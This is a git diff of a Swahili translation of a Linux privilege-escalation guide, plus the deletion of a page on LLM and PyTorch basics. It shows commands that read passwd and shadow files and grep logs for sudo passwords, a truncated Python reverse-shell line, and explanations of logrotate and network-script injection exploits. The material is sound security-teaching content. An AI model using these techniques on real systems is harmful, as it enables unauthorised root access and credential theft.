- **PermitEmptyPasswords**: Wakati uthibitishaji wa nenosiri unaruhusiwa, inaeleza ikiwa seva inaruhusu kuingia kwenye akaunti zenye nywila tupu. Kiwango cha kawaida ni `no`.
 | 
			
		||||
- **PasswordAuthentication:** Inaelezea ikiwa uthibitishaji wa nenosiri unaruhusiwa. Kiwango cha kawaida ni `no`.
 | 
			
		||||
- **PubkeyAuthentication:** Inaelezea ikiwa uthibitishaji wa funguo za umma unaruhusiwa. Kiwango cha kawaida ni `yes`.
 | 
			
		||||
- **PermitEmptyPasswords**: Wakati uthibitishaji wa nenosiri unaruhusiwa, inaelezea ikiwa seva inaruhusu kuingia kwenye akaunti zenye nywila tupu. Kiwango cha kawaida ni `no`.
 | 
			
		||||
 | 
			
		||||
### PermitRootLogin
 | 
			
		||||
 | 
			
		||||
Inaeleza ikiwa root anaweza kuingia kwa kutumia ssh, kiwango cha kawaida ni `no`. Thamani zinazowezekana:
 | 
			
		||||
Inaelezea ikiwa root anaweza kuingia kwa kutumia ssh, kiwango cha kawaida ni `no`. Thamani zinazowezekana:
 | 
			
		||||
 | 
			
		||||
- `yes`: root anaweza kuingia kwa kutumia nenosiri na funguo ya faragha
 | 
			
		||||
- `without-password` au `prohibit-password`: root anaweza kuingia tu kwa funguo ya faragha
 | 
			
		||||
- `forced-commands-only`: Root anaweza kuingia tu kwa kutumia funguo ya faragha na ikiwa chaguo za amri zimeelezwa
 | 
			
		||||
- `yes`: root anaweza kuingia kwa kutumia nenosiri na funguo ya kibinafsi
 | 
			
		||||
- `without-password` au `prohibit-password`: root anaweza kuingia tu kwa funguo ya kibinafsi
 | 
			
		||||
- `forced-commands-only`: Root anaweza kuingia tu kwa kutumia funguo ya kibinafsi na ikiwa chaguo za amri zimeelezwa
 | 
			
		||||
- `no` : hapana
 | 
			
		||||
 | 
			
		||||
### AuthorizedKeysFile
 | 
			
		||||
 | 
			
		||||
Inaeleza faili ambazo zinafunguo za umma ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na alama kama `%h`, ambayo itabadilishwa na saraka ya nyumbani. **Unaweza kuashiria njia kamili** (zinazoanzia `/`) au **njia za kulinganisha kutoka nyumbani kwa mtumiaji**. Kwa mfano:
 | 
			
		||||
Inaelezea faili ambazo zinafunguo za umma ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na alama kama `%h`, ambayo itabadilishwa na saraka ya nyumbani. **Unaweza kuashiria njia kamili** (zinazoanzia na `/`) au **njia za kulinganisha kutoka nyumbani kwa mtumiaji**. Kwa mfano:
 | 
			
		||||
```bash
 | 
			
		||||
AuthorizedKeysFile    .ssh/authorized_keys access
 | 
			
		||||
```
 | 
			
		||||
@ -1151,7 +1151,7 @@ Iyo usanidi utaonyesha kwamba ikiwa unajaribu kuingia na **funguo** ya mtumiaji
 | 
			
		||||
 | 
			
		||||
### ForwardAgent/AllowAgentForwarding
 | 
			
		||||
 | 
			
		||||
SSH agent forwarding inakuwezesha **kutumia funguo zako za SSH za ndani badala ya kuacha funguo** (bila nywila!) zikiwa kwenye seva yako. Hivyo, utaweza **kuruka** kupitia ssh **kwenda kwenye mwenyeji** na kutoka hapo **kuruka kwenye mwenyeji mwingine** **ukitumia** **funguo** iliyoko kwenye **mwenyeji wako wa awali**.
 | 
			
		||||
SSH agent forwarding inakuwezesha **kutumia funguo zako za SSH za ndani badala ya kuacha funguo** (bila nywila!) zikiwa kwenye seva yako. Hivyo, utaweza **kuruka** kupitia ssh **kwenda kwenye mwenyeji** na kutoka hapo **kuruka kwenda kwenye mwenyeji mwingine** **ukitumia** **funguo** iliyoko kwenye **mwenyeji wako wa awali**.
 | 
			
		||||
 | 
			
		||||
Unahitaji kuweka chaguo hili katika `$HOME/.ssh.config` kama ifuatavyo:
 | 
			
		||||
```
 | 
			
		||||
@ -1161,7 +1161,7 @@ ForwardAgent yes
 | 
			
		||||
Kumbuka kwamba ikiwa `Host` ni `*` kila wakati mtumiaji an跳a kwenye mashine tofauti, mwenyeji huyo ataweza kufikia funguo (ambayo ni tatizo la usalama).
 | 
			
		||||
 | 
			
		||||
Faili `/etc/ssh_config` inaweza **kufuta** hizi **chaguzi** na kuruhusu au kukataa usanidi huu.\
 | 
			
		||||
Faili `/etc/sshd_config` inaweza **kuruhusu** au **kukataa** ssh-agent forwarding kwa neno muhimu `AllowAgentForwarding` (kawaida ni ruhusa).
 | 
			
		||||
Faili `/etc/sshd_config` inaweza **kuruhusu** au **kukataa** ssh-agent forwarding kwa neno kuu `AllowAgentForwarding` (kawaida ni ruhusa).
 | 
			
		||||
 | 
			
		||||
Ikiwa unapata kwamba Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kama **unaweza kuweza kuitumia vibaya ili kupandisha mamlaka**:
 | 
			
		||||
 | 
			
		||||
@ -1173,7 +1173,7 @@ ssh-forward-agent-exploitation.md
 | 
			
		||||
 | 
			
		||||
### Faili za Profaili
 | 
			
		||||
 | 
			
		||||
Faili `/etc/profile` na faili zilizo chini ya `/etc/profile.d/` ni **scripts ambazo zinafanywa wakati mtumiaji anapokimbia shell mpya**. Hivyo, ikiwa unaweza **kuandika au kubadilisha yoyote kati yao unaweza kupandisha mamlaka**.
 | 
			
		||||
Faili `/etc/profile` na faili zilizo chini ya `/etc/profile.d/` ni **scripts ambazo zinafanywa wakati mtumiaji anapokimbia shell mpya**. Hivyo, ikiwa unaweza **kuandika au kubadilisha yoyote yao unaweza kupandisha mamlaka**.
 | 
			
		||||
```bash
 | 
			
		||||
ls -l /etc/profile /etc/profile.d/
 | 
			
		||||
```
 | 
			
		||||
@ -1181,7 +1181,7 @@ Ikiwa kuna skripti za wasifu zisizo za kawaida, unapaswa kuziangalia kwa **maele
 | 
			
		||||
 | 
			
		||||
### Faili za Passwd/Shadow
 | 
			
		||||
 | 
			
		||||
Kulingana na OS, faili za `/etc/passwd` na `/etc/shadow` zinaweza kuwa na jina tofauti au kuna nakala ya akiba. Kwa hivyo inashauriwa **kupata zote** na **kuangalia kama unaweza kusoma** ili kuona **kama kuna hash** ndani ya faili hizo:
 | 
			
		||||
Kulingana na OS, faili za `/etc/passwd` na `/etc/shadow` zinaweza kuwa na jina tofauti au kuna nakala ya akiba. Kwa hivyo inashauriwa **kupata zote** na **kuangalia kama unaweza kusoma** ili kuona **kama kuna hash** ndani ya faili:
 | 
			
		||||
```bash
 | 
			
		||||
#Passwd equivalent files
 | 
			
		||||
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
 | 
			
		||||
@ -1280,24 +1280,24 @@ ls -alhR /srv/www/htdocs/ 2>/dev/null
 | 
			
		||||
ls -alhR /usr/local/www/apache22/data/
 | 
			
		||||
ls -alhR /opt/lampp/htdocs/ 2>/dev/null
 | 
			
		||||
```
 | 
			
		||||
### **Makaratasi**
 | 
			
		||||
### **Makaratasi ya Nyuma**
 | 
			
		||||
```bash
 | 
			
		||||
find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null
 | 
			
		||||
```
 | 
			
		||||
### Known files containing passwords
 | 
			
		||||
 | 
			
		||||
Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **faili kadhaa zinazoweza kuwa na nywila**.\
 | 
			
		||||
**Chombo kingine cha kuvutia** ambacho unaweza kutumia kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambacho ni programu ya chanzo wazi inayotumika kupata nywila nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac.
 | 
			
		||||
**Zana nyingine ya kuvutia** ambayo unaweza kutumia kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambayo ni programu ya chanzo wazi inayotumika kupata nywila nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac.
 | 
			
		||||
 | 
			
		||||
### Logs
 | 
			
		||||
 | 
			
		||||
Ikiwa unaweza kusoma logi, huenda ukapata **habari za kuvutia/za siri ndani yao**. Kadri logi inavyokuwa ya ajabu, ndivyo itakavyokuwa ya kuvutia zaidi (labda).\
 | 
			
		||||
Pia, baadhi ya "**mbaya**" zilizowekwa vibaya (zilizokuwa na backdoor?) **logi za ukaguzi** zinaweza kukuruhusu **kurekodi nywila** ndani ya logi za ukaguzi kama ilivyoelezwa katika chapisho hili: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
 | 
			
		||||
Pia, baadhi ya logi za "**mbaya**" zilizowekwa vibaya (zilizokuwa na backdoor?) zinaweza kukuruhusu **kurekodi nywila** ndani ya logi za ukaguzi kama ilivyoelezwa katika chapisho hili: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
 | 
			
		||||
```bash
 | 
			
		||||
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
 | 
			
		||||
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
 | 
			
		||||
```
 | 
			
		||||
Ili **kusoma kumbukumbu kundi** [**adm**](interesting-groups-linux-pe/index.html#adm-group) itakuwa ya msaada mkubwa.
 | 
			
		||||
Ili **kusoma kumbukumbu za log** kundi la [**adm**](interesting-groups-linux-pe/index.html#adm-group) litakuwa na msaada mkubwa.
 | 
			
		||||
 | 
			
		||||
### Faili za Shell
 | 
			
		||||
```bash
 | 
			
		||||
@ -1327,26 +1327,26 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
 | 
			
		||||
```
 | 
			
		||||
### Logrotate exploitation
 | 
			
		||||
 | 
			
		||||
Uthibitisho wa udhaifu katika `logrotate` unawaruhusu watumiaji wenye **idhini za kuandika** kwenye faili la log au saraka zake za mzazi kupata haki za juu. Hii ni kwa sababu `logrotate`, mara nyingi ikikimbia kama **root**, inaweza kudhibitiwa ili kutekeleza faili zisizo na mipaka, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kuangalia idhini si tu katika _/var/log_ bali pia katika saraka yoyote ambapo mzunguko wa log unatumika.
 | 
			
		||||
Uthibitisho katika `logrotate` unawaruhusu watumiaji wenye **idhini za kuandika** kwenye faili la log au saraka zake za mzazi kupata haki za juu. Hii ni kwa sababu `logrotate`, mara nyingi ikikimbia kama **root**, inaweza kudhibitiwa ili kutekeleza faili zisizo na mipaka, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kuangalia idhini si tu katika _/var/log_ bali pia katika saraka yoyote ambapo mzunguko wa log unatumika.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Uthibitisho huu wa udhaifu unahusisha `logrotate` toleo `3.18.0` na la zamani
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Uthibitisho huu unahusisha toleo la `logrotate` `3.18.0` na la zamani
 | 
			
		||||
 | 
			
		||||
Taarifa zaidi kuhusu udhaifu huu inaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
 | 
			
		||||
Taarifa zaidi kuhusu uthibitisho huu inaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
 | 
			
		||||
 | 
			
		||||
Unaweza kutumia udhaifu huu kwa [**logrotten**](https://github.com/whotwagner/logrotten).
 | 
			
		||||
Unaweza kutumia uthibitisho huu kwa [**logrotten**](https://github.com/whotwagner/logrotten).
 | 
			
		||||
 | 
			
		||||
Uthibitisho huu wa udhaifu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila wakati unapata kuwa unaweza kubadilisha logs, angalia ni nani anayesimamia hizo logs na angalia kama unaweza kupandisha haki kwa kubadilisha logs kwa symlinks.
 | 
			
		||||
Uthibitisho huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila wakati unapata kuwa unaweza kubadilisha logs, angalia nani anayeendesha hizo logs na angalia kama unaweza kupandisha haki kwa kubadilisha logs kwa symlinks.
 | 
			
		||||
 | 
			
		||||
### /etc/sysconfig/network-scripts/ (Centos/Redhat)
 | 
			
		||||
 | 
			
		||||
**Kumbukumbu ya udhaifu:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 | 
			
		||||
**Kumbukumbu ya uthibitisho:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 | 
			
		||||
 | 
			
		||||
Ikiwa, kwa sababu yoyote, mtumiaji anaweza **kuandika** script ya `ifcf-<chochote>` kwenye _/etc/sysconfig/network-scripts_ **au** inaweza **kurekebisha** ile iliyopo, basi **mfumo wako umepatikana**.
 | 
			
		||||
Ikiwa, kwa sababu yoyote, mtumiaji anaweza **kuandika** script ya `ifcf-<chochote>` kwenye _/etc/sysconfig/network-scripts_ **au** inaweza **kurekebisha** ile iliyopo, basi **sistimu yako imepata udhibiti**.
 | 
			
		||||
 | 
			
		||||
Scripts za mtandao, _ifcg-eth0_ kwa mfano zinatumika kwa muunganisho wa mtandao. Zinatazama kama faili za .INI. Hata hivyo, zinatumika \~sourced\~ kwenye Linux na Network Manager (dispatcher.d).
 | 
			
		||||
Scripts za mtandao, _ifcg-eth0_ kwa mfano zinatumika kwa muunganisho wa mtandao. Zinatazama kama faili za .INI. Hata hivyo, zinachukuliwa \~sourced\~ kwenye Linux na Network Manager (dispatcher.d).
 | 
			
		||||
 | 
			
		||||
Katika kesi yangu, `NAME=` inayotolewa katika hizi scripts za mtandao haishughulikiwi ipasavyo. Ikiwa una **nafasi nyeupe/boreshaji katika jina mfumo unajaribu kutekeleza sehemu baada ya nafasi nyeupe/boreshaji**. Hii ina maana kwamba **kila kitu baada ya nafasi ya kwanza ya boreshaji kinatekelezwa kama root**.
 | 
			
		||||
Katika kesi yangu, `NAME=` inayotolewa katika hizi scripts za mtandao haishughulikiwi ipasavyo. Ikiwa una **nafasi nyeupe/boreshaji katika jina, mfumo unajaribu kutekeleza sehemu baada ya nafasi nyeupe/boreshaji**. Hii ina maana kwamba **kila kitu baada ya nafasi ya kwanza nyeupe kinatekelezwa kama root**.
 | 
			
		||||
 | 
			
		||||
Kwa mfano: _/etc/sysconfig/network-scripts/ifcfg-1337_
 | 
			
		||||
```bash
 | 
			
		||||
@ -1356,9 +1356,9 @@ DEVICE=eth0
 | 
			
		||||
```
 | 
			
		||||
### **init, init.d, systemd, na rc.d**
 | 
			
		||||
 | 
			
		||||
Direktori `/etc/init.d` ni nyumbani kwa **scripts** za System V init (SysVinit), **mfumo wa usimamizi wa huduma za Linux wa jadi**. Inajumuisha scripts za `kuanzisha`, `kusitisha`, `kurejesha`, na wakati mwingine `kureload` huduma. Hizi zinaweza kutekelezwa moja kwa moja au kupitia viungo vya alama vinavyopatikana katika `/etc/rc?.d/`. Njia mbadala katika mifumo ya Redhat ni `/etc/rc.d/init.d`.
 | 
			
		||||
Direktori `/etc/init.d` ni nyumbani kwa **scripts** za System V init (SysVinit), **mfumo wa usimamizi wa huduma za Linux wa jadi**. Inajumuisha scripts za `kuanzisha`, `kusitisha`, `kurudisha`, na wakati mwingine `kureload` huduma. Hizi zinaweza kutekelezwa moja kwa moja au kupitia viungo vya alama vinavyopatikana katika `/etc/rc?.d/`. Njia mbadala katika mifumo ya Redhat ni `/etc/rc.d/init.d`.
 | 
			
		||||
 | 
			
		||||
Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, **usimamizi wa huduma** wa kisasa ulioanzishwa na Ubuntu, ukitumia faili za usanidi kwa kazi za usimamizi wa huduma. Licha ya mpito kwenda Upstart, scripts za SysVinit bado zinatumika pamoja na usanidi wa Upstart kutokana na safu ya ulinganifu katika Upstart.
 | 
			
		||||
Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya wa **usimamizi wa huduma** ulioanzishwa na Ubuntu, ukitumia faili za usanidi kwa kazi za usimamizi wa huduma. Licha ya mpito kwenda Upstart, scripts za SysVinit bado zinatumika pamoja na usanidi wa Upstart kutokana na safu ya ulinganifu katika Upstart.
 | 
			
		||||
 | 
			
		||||
**systemd** inajitokeza kama msimamizi wa kisasa wa kuanzisha na huduma, ikitoa vipengele vya juu kama vile kuanzisha daemon kwa mahitaji, usimamizi wa automount, na picha za hali ya mfumo. Inapanga faili katika `/usr/lib/systemd/` kwa ajili ya pakiti za usambazaji na `/etc/systemd/system/` kwa ajili ya marekebisho ya msimamizi, ikirahisisha mchakato wa usimamizi wa mfumo.
 | 
			
		||||
 | 
			
		||||
@ -1370,7 +1370,7 @@ Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, **usimamizi wa hudu
 | 
			
		||||
nfs-no_root_squash-misconfiguration-pe.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
### Kutoka kwenye Shells zilizozuiliwa
 | 
			
		||||
### Kutoka kwenye Shell zilizopunguzika
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
escaping-from-limited-bash.md
 | 
			
		||||
@ -1400,7 +1400,7 @@ cisco-vmanage.md
 | 
			
		||||
**Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\
 | 
			
		||||
**Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\
 | 
			
		||||
**BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\
 | 
			
		||||
**Kernelpop:** Kuorodhesha udhaifu wa kernel ndani ya linux na MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\
 | 
			
		||||
**Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\
 | 
			
		||||
**Mestaploit:** _**multi/recon/local_exploit_suggester**_\
 | 
			
		||||
**Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\
 | 
			
		||||
**EvilAbigail (ufikiaji wa kimwili):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\
 | 
			
		||||
 | 
			
		||||
@ -1,285 +0,0 @@
 | 
			
		||||
# 0. Basic LLM Concepts
 | 
			
		||||
 | 
			
		||||
## Pretraining
 | 
			
		||||
 | 
			
		||||
Pretraining ni hatua ya msingi katika kuendeleza mfano mkubwa wa lugha (LLM) ambapo mfano unakabiliwa na kiasi kikubwa na tofauti za data za maandiko. Wakati wa hatua hii, **LLM inajifunza muundo wa msingi, mifumo, na nuances za lugha**, ikiwa ni pamoja na sarufi, msamiati, sintaksia, na uhusiano wa muktadha. Kwa kuchakata data hii kubwa, mfano unapata uelewa mpana wa lugha na maarifa ya jumla ya ulimwengu. Msingi huu wa kina unamwezesha LLM kutoa maandiko yanayofaa na yanayohusiana na muktadha. Baadaye, mfano huu ulioandaliwa unaweza kupitia mchakato wa kuboresha, ambapo unafundishwa zaidi kwenye seti maalum za data ili kubadilisha uwezo wake kwa kazi au maeneo maalum, kuboresha utendaji wake na umuhimu katika matumizi yaliyokusudiwa.
 | 
			
		||||
 | 
			
		||||
## Main LLM components
 | 
			
		||||
 | 
			
		||||
Kawaida LLM inajulikana kwa usanidi unaotumika kuifundisha. Hizi ndizo sehemu za kawaida wakati wa kufundisha LLM:
 | 
			
		||||
 | 
			
		||||
- **Parameters**: Parameters ni **uzito na upendeleo unaoweza kujifunzwa** katika mtandao wa neva. Hizi ni nambari ambazo mchakato wa mafunzo unarekebisha ili kupunguza kazi ya hasara na kuboresha utendaji wa mfano kwenye kazi. LLMs kawaida hutumia mamilioni ya parameters.
 | 
			
		||||
- **Context Length**: Hii ni urefu wa juu wa kila sentensi inayotumika kuandaa LLM.
 | 
			
		||||
- **Embedding Dimension**: Ukubwa wa vector inayotumika kuwakilisha kila token au neno. LLMs kawaida hutumia bilioni za dimensions.
 | 
			
		||||
- **Hidden Dimension**: Ukubwa wa tabaka zilizofichwa katika mtandao wa neva.
 | 
			
		||||
- **Number of Layers (Depth)**: Ni tabaka ngapi mfano unao. LLMs kawaida hutumia makumi ya tabaka.
 | 
			
		||||
- **Number of Attention Heads**: Katika mifano ya transformer, hii ni idadi ya mitambo tofauti ya umakini inayotumika katika kila tabaka. LLMs kawaida hutumia makumi ya vichwa.
 | 
			
		||||
- **Dropout**: Dropout ni kitu kama asilimia ya data inayondolewa (uwezekano unakuwa 0) wakati wa mafunzo inayotumika **kuzuia overfitting.** LLMs kawaida hutumia kati ya 0-20%.
 | 
			
		||||
 | 
			
		||||
Configuration of the GPT-2 model:
 | 
			
		||||
```json
 | 
			
		||||
GPT_CONFIG_124M = {
 | 
			
		||||
"vocab_size": 50257,  // Vocabulary size of the BPE tokenizer
 | 
			
		||||
"context_length": 1024, // Context length
 | 
			
		||||
"emb_dim": 768,       // Embedding dimension
 | 
			
		||||
"n_heads": 12,        // Number of attention heads
 | 
			
		||||
"n_layers": 12,       // Number of layers
 | 
			
		||||
"drop_rate": 0.1,     // Dropout rate: 10%
 | 
			
		||||
"qkv_bias": False     // Query-Key-Value bias
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
## Tensors in PyTorch
 | 
			
		||||
 | 
			
		||||
Katika PyTorch, **tensor** ni muundo wa data wa msingi unaotumikia kama array ya vipimo vingi, ukijumlisha dhana kama scalars, vectors, na matrices kwa vipimo vya juu zaidi. Tensors ndio njia kuu ambayo data inawakilishwa na kushughulikiwa katika PyTorch, hasa katika muktadha wa deep learning na neural networks.
 | 
			
		||||
 | 
			
		||||
### Mathematical Concept of Tensors
 | 
			
		||||
 | 
			
		||||
- **Scalars**: Tensors wa kiwango cha 0, wak representing nambari moja (dimensional sifuri). Kama: 5
 | 
			
		||||
- **Vectors**: Tensors wa kiwango cha 1, wak representing array ya dimensional moja ya nambari. Kama: \[5,1]
 | 
			
		||||
- **Matrices**: Tensors wa kiwango cha 2, wak representing arrays za dimensional mbili zenye mistari na nguzo. Kama: \[\[1,3], \[5,2]]
 | 
			
		||||
- **Higher-Rank Tensors**: Tensors wa kiwango cha 3 au zaidi, wak representing data katika vipimo vya juu (mfano, tensors za 3D kwa picha za rangi).
 | 
			
		||||
 | 
			
		||||
### Tensors as Data Containers
 | 
			
		||||
 | 
			
		||||
Kutoka kwa mtazamo wa hesabu, tensors hufanya kazi kama vyombo vya data vya vipimo vingi, ambapo kila kipimo kinaweza kuwakilisha vipengele tofauti au nyanja za data. Hii inafanya tensors kuwa na uwezo mkubwa wa kushughulikia seti za data ngumu katika kazi za machine learning.
 | 
			
		||||
 | 
			
		||||
### PyTorch Tensors vs. NumPy Arrays
 | 
			
		||||
 | 
			
		||||
Ingawa tensors za PyTorch zinafanana na arrays za NumPy katika uwezo wao wa kuhifadhi na kushughulikia data za nambari, zinatoa kazi za ziada muhimu kwa ajili ya deep learning:
 | 
			
		||||
 | 
			
		||||
- **Automatic Differentiation**: Tensors za PyTorch zinasaidia hesabu ya moja kwa moja ya gradients (autograd), ambayo inarahisisha mchakato wa kuhesabu derivatives zinazohitajika kwa ajili ya mafunzo ya neural networks.
 | 
			
		||||
- **GPU Acceleration**: Tensors katika PyTorch zinaweza kuhamishwa na kuhesabiwa kwenye GPUs, ikiongeza kasi ya hesabu kubwa.
 | 
			
		||||
 | 
			
		||||
### Creating Tensors in PyTorch
 | 
			
		||||
 | 
			
		||||
Unaweza kuunda tensors kwa kutumia kazi ya `torch.tensor`:
 | 
			
		||||
```python
 | 
			
		||||
pythonCopy codeimport torch
 | 
			
		||||
 | 
			
		||||
# Scalar (0D tensor)
 | 
			
		||||
tensor0d = torch.tensor(1)
 | 
			
		||||
 | 
			
		||||
# Vector (1D tensor)
 | 
			
		||||
tensor1d = torch.tensor([1, 2, 3])
 | 
			
		||||
 | 
			
		||||
# Matrix (2D tensor)
 | 
			
		||||
tensor2d = torch.tensor([[1, 2],
 | 
			
		||||
[3, 4]])
 | 
			
		||||
 | 
			
		||||
# 3D Tensor
 | 
			
		||||
tensor3d = torch.tensor([[[1, 2], [3, 4]],
 | 
			
		||||
[[5, 6], [7, 8]]])
 | 
			
		||||
```
 | 
			
		||||
### Aina za Data za Tensor
 | 
			
		||||
 | 
			
		||||
PyTorch tensors zinaweza kuhifadhi data za aina mbalimbali, kama vile nambari nzima na nambari za kuogelea.
 | 
			
		||||
 | 
			
		||||
Unaweza kuangalia aina ya data ya tensor kwa kutumia sifa ya `.dtype`:
 | 
			
		||||
```python
 | 
			
		||||
tensor1d = torch.tensor([1, 2, 3])
 | 
			
		||||
print(tensor1d.dtype)  # Output: torch.int64
 | 
			
		||||
```
 | 
			
		||||
- Tensors zilizoundwa kutoka kwa nambari za Python ni za aina `torch.int64`.
 | 
			
		||||
- Tensors zilizoundwa kutoka kwa float za Python ni za aina `torch.float32`.
 | 
			
		||||
 | 
			
		||||
Ili kubadilisha aina ya data ya tensor, tumia njia ya `.to()`:
 | 
			
		||||
```python
 | 
			
		||||
float_tensor = tensor1d.to(torch.float32)
 | 
			
		||||
print(float_tensor.dtype)  # Output: torch.float32
 | 
			
		||||
```
 | 
			
		||||
### Common Tensor Operations
 | 
			
		||||
 | 
			
		||||
PyTorch inatoa aina mbalimbali za operesheni za kushughulikia tensors:
 | 
			
		||||
 | 
			
		||||
- **Accessing Shape**: Tumia `.shape` kupata vipimo vya tensor.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
print(tensor2d.shape)  # Output: torch.Size([2, 2])
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
- **Reshaping Tensors**: Tumia `.reshape()` au `.view()` kubadilisha umbo.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
reshaped = tensor2d.reshape(4, 1)
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
- **Transposing Tensors**: Tumia `.T` kubadilisha tensor ya 2D.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
transposed = tensor2d.T
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
- **Matrix Multiplication**: Tumia `.matmul()` au opereta `@`.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
result = tensor2d @ tensor2d.T
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
### Importance in Deep Learning
 | 
			
		||||
 | 
			
		||||
Tensors ni muhimu katika PyTorch kwa ajili ya kujenga na kufundisha mitandao ya neva:
 | 
			
		||||
 | 
			
		||||
- Wanahifadhi data za ingizo, uzito, na bias.
 | 
			
		||||
- Wanarahisisha operesheni zinazohitajika kwa ajili ya kupita mbele na nyuma katika algorithimu za mafunzo.
 | 
			
		||||
- Pamoja na autograd, tensors zinawezesha hesabu ya moja kwa moja ya gradients, ikirahisisha mchakato wa optimization.
 | 
			
		||||
 | 
			
		||||
## Automatic Differentiation
 | 
			
		||||
 | 
			
		||||
Automatic differentiation (AD) ni mbinu ya kompyuta inayotumika **kuthibitisha derivatives (gradients)** za kazi kwa ufanisi na kwa usahihi. Katika muktadha wa mitandao ya neva, AD inawezesha hesabu ya gradients zinazohitajika kwa ajili ya **algorithimu za optimization kama gradient descent**. PyTorch inatoa injini ya utofautishaji wa moja kwa moja inayoitwa **autograd** ambayo inarahisisha mchakato huu.
 | 
			
		||||
 | 
			
		||||
### Mathematical Explanation of Automatic Differentiation
 | 
			
		||||
 | 
			
		||||
**1. The Chain Rule**
 | 
			
		||||
 | 
			
		||||
Katika msingi wa utofautishaji wa moja kwa moja ni **chain rule** kutoka kwa calculus. Chain rule inasema kwamba ikiwa una muundo wa kazi, derivative ya kazi iliyounganishwa ni bidhaa ya derivatives za kazi zilizounganishwa.
 | 
			
		||||
 | 
			
		||||
Kihesabu, ikiwa `y=f(u)` na `u=g(x)`, basi derivative ya `y` kwa heshima na `x` ni:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**2. Computational Graph**
 | 
			
		||||
 | 
			
		||||
Katika AD, hesabu zinawakilishwa kama voz katika **computational graph**, ambapo kila voz inahusiana na operesheni au variable. Kwa kupita katika graph hii, tunaweza kuhesabu derivatives kwa ufanisi.
 | 
			
		||||
 | 
			
		||||
3. Example
 | 
			
		||||
 | 
			
		||||
Hebu tuchukue kazi rahisi:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Ambapo:
 | 
			
		||||
 | 
			
		||||
- `σ(z)` ni kazi ya sigmoid.
 | 
			
		||||
- `y=1.0` ni lebo ya lengo.
 | 
			
		||||
- `L` ni hasara.
 | 
			
		||||
 | 
			
		||||
